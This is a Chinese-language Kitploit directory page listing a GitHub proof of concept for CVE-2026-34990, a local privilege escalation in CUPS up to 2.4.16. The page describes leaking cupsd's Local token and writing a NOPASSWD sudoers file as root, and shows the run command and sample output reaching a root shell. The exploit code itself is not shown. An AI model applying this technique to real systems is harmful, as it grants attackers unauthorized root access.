Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-34990 — CVE-2026-34990 的最小 PoC:CUPS <= 2.4.16 中的本地权限提升漏洞,可泄露 cupsd 的 Local 认证令牌,并以 root 身份写入 NOPASSWD sudoers 片段。 | Kitploit
工具/GitHubGitHub/predyy/cve-2026-34990
权限提升漏洞分析漏洞利用安全虚拟化渗透测试
GitHubpredyy/cve-2026-34990

CVE-2026-34990

CVE-2026-34990 的最小 PoC:CUPS <= 2.4.16 中的本地权限提升漏洞,可泄露 cupsd 的 Local 认证令牌,并以 root 身份写入 NOPASSWD sudoers 片段。

查看仓库
293天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-34990 - CUPS 本地提权

针对以 root 身份运行的 CUPS <= 2.4.16 的本地权限提升。 泄露 cupsd 的 Local 认证令牌,然后通过 file:// 打印队列以 root 身份写入一个 NOPASSWD sudoers 片段。

用法

python3 poc.py

成功时:

[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i

然后:

sudo -i

免责声明

此脚本仅供教育目的使用。作者不对由该漏洞利用造成的任何滥用或损害负责。在测试或利用漏洞之前,请务必确保您已获得授权!

下载工具